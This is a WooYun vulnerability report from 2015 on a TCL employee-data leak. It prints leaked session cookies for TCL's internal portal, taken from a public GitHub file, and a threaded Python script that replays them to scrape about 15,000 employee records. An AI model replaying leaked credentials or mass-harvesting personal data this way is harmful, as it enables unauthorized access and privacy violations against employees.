当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141726

漏洞标题:github-hacker之TCL一万五千多名员工信息泄漏(git泄密新场景)

相关厂商:TCL官方网上商城

漏洞作者: 纳米翡翠

提交时间:2015-09-17 11:49

修复时间:2015-11-01 14:38

公开时间:2015-11-01 14:38

漏洞类型:用户资料大量泄漏

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-17: 细节已通知厂商并且等待厂商处理中
2015-09-17: 厂商已经确认,细节仅向厂商公开
2015-09-27: 细节向核心白帽子及相关领域专家公开
2015-10-07: 细节向普通白帽子公开
2015-10-17: 细节向实习白帽子公开
2015-11-01: 细节向公众公开

简要描述:

TCL全部员工信息泄漏,包括职位、姓名、电话、住址、email等

详细说明:

1.github search到以下信息
https://github.com/s3cu1n4/mycode/blob/master/temp/test.txt

QQ截图20150917113353.jpg


base64解密后结果如下:

GET /phones/ViewInfo.aspx?RoleNo=0101&page=1 HTTP/1.1
Host: eip.tcl.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36
DNT: 1
Referer: http://eip.tcl.com/phones/ViewInfo.aspx?RoleNo=0101&page=2
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4
Cookie: JAAPSESSIONID=JPlpuPM8OPkWbkkokqs6pTPNiGzNCMPz; Proxy_user=LPGhRYaM8EK9GzmisfwsXTHNwtjGdpqEVpdpwdv6VBR85Wqzfal4wrBkTliCC37B; LtpaToken2=dXXXYV9xPHRLzeV7SlsFqaxJ9mnBPpxCgJJFgSb1AeZuyUCzGu5Atiy3C4UFrQQfua3+0RXVemWraEbKiX6RhnCwSidEkM5sehN/oEU1yYgQ1xVY+gHDMjjNICAHtMguq8UwyKXEc39+Ct45eQF68wsupcpowvhlV1ONmNPWHkxY3nppHy75oaBVk+l4YjXb+PHtZsDlaIa50ur37+OeSIbC4mI+UTHxbWbQste3tmdhieXA5oVCgVPWsBBBtflZrqj1h47RVeGRiIvOIGbvlQwu2OWStA3zAjDOBcnjFMKp33RIANy2wz315TA1C0G8f8m9R5DozkOAseJVLPUCQb/an8LUvRrlvGfmHeJ3RSHOSRPe4WIGhN/7+MpqTOftv6hbxmRmpniPz+JKTWrSkvSa1+dP/tIVU4pNmms8o/bsQovPrBFg6a7qUlD0O/fLG+EqFLasE4mlT9vfz7wOrwvpXGmdXnYds/Q2+a/x0yhHgbHWT0+SKAvH4ZRW6v1w1dfVsZ7DE4RE10ogeWZI8clOp3KfON4wIWG+uQZtuhwKpMf48DY/GGUNtzIMqMEXh6dGI1zRHdnPejxU/PBFfJGztff4p9fqqeir3TQsAQ7FlD9mtQyGwRQ/GL+ZXIQVf0oihuE31sZfCf3P2NqUBiMx/E1AK0cz64CAwyr949M8cH8ZqC6tt/s+Tz2Vc0ItRKsqVFlvifgzR1t+2eez0i66cxmUB8edhIQJ7nKChy5KWyyy6DojsZ2gsDlxNVRz8DCWPWessI5JfAowHZYkSA==; LtpaToken=EndxvXShVNqSXQ1doiNyTvMWR6Y/X7J+5Bhs9cvrb541MCG5lJXu/8gxhhJlvnyfFYnGk2p+2thMr5a2qOpl7PaarQ5jSZySXsWUay1nPIUV0+0nsgDweLKsyM2p+w76P0onwZgcDBCObVl2N9wVdghK/nCZ3oGtbd+RAtA7j2ovVqxjJ4kDjy/UMML1tbb73c8zC6dPh05FI8ge89sqgnDwwhcVNaACG+fF7h7OCrEhJA1IQMSy9SCP8CrQ9Vw5Xs4IwXkzwyFptCgAxegMZIdhG92p9gRbNvdra43+SxsxUq3D+jW4jXxiWV5qCy9gifWfxqFx9sE1+mB3Q+nRG66+IT+meski/nD3KkRaBqq+b2HfL/gv7fDaVD5D15poiNtjAqip6KQ6MudME14VQtrw2NWyY6hg+G0IW+C55A5gsBBGbpuzJn8AS0a8kdAwTAECd1Vi1fBCKyPwGiHGAA==; ASP.NET_SessionId=1f44ueqbxxqb54fdk5lj4czv
Connection: close


复制cookie到浏览器,访问其中的url,即可直接进入eip

QQ截图20150917113732.jpg


TCL全部员工信息一览无余
写个脚本爬一下数据

#coding:utf-8
import re
import urllib2
import threading
import time
start = 1
end = 880
def getContent(respInfo):
reg1 = r'<param name="flashvars" value="(.*?)">'
re.pattern1 = re.compile(reg1)
match1 = re.pattern1.findall(respInfo)
info = match1[0]
if info == ',,,,, ':
print "--"
else:
writeFile(info)
def writeFile(info):
with open("tclinfo.txt", 'a') as fd:
fd.write(info+'\r\n')
def request(end):
print end
try:
Url = "http://eip.tcl.com/phones/ViewInfo.aspx?RoleNo=0101&page=%s" %end
req = urllib2.Request(Url)
req.add_header('User-Agent', "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 OPR/29.0.1795.60 (Edition Baidu)")
req.add_header('Accept', '*/*')
req.add_header('Cookie', 'ASP.NET_SessionId=1f44ueqbxxqb54fdk5lj4czv; LtpaToken=EndxvXShVNqSXQ1doiNyTvMWR6Y/X7J+5Bhs9cvrb541MCG5lJXu/8gxhhJlvnyfFYnGk2p+2thMr5a2qOpl7PaarQ5jSZySXsWUay1nPIUV0+0nsgDweLKsyM2p+w76P0onwZgcDBCObVl2N9wVdghK/nCZ3oGtbd+RAtA7j2ovVqxjJ4kDjy/UMML1tbb73c8zC6dPh05FI8ge89sqgnDwwhcVNaACG+fF7h7OCrEhJA1IQMSy9SCP8CrQ9Vw5Xs4IwXkzwyFptCgAxegMZIdhG92p9gRbNvdra43+SxsxUq3D+jW4jXxiWV5qCy9gifWfxqFx9sE1+mB3Q+nRG66+IT+meski/nD3KkRaBqq+b2HfL/gv7fDaVD5D15poiNtjAqip6KQ6MudME14VQtrw2NWyY6hg+G0IW+C55A5gsBBGbpuzJn8AS0a8kdAwTAECd1Vi1fBCKyPwGiHGAA==')
resp = urllib2.urlopen(req)
respInfo = resp.read().replace("\r", "").replace("\n", "")
except:
pass
finally:
getContent(respInfo)
def main():
global end
global start
while end > start:
end = end-1
request(end)
def thread():
a = threading.Thread(target=main)
a.start()
if __name__ == '__main__':
for t in range(1, 10):
thread()


即可爬到所有信息,之后再对信息整理,即可拿到所有用户信息共一万五千多条

QQ截图20150917114025.jpg

漏洞证明:

修复方案:

版权声明:转载请注明来源 纳米翡翠@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-09-17 14:37

厂商回复:

您好,该系统已经停止使用,不过暂时未下架,感谢您对TCL的关注,谢谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-09-17 11:51 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    有意思,不是直接的泄露,洞主很细心。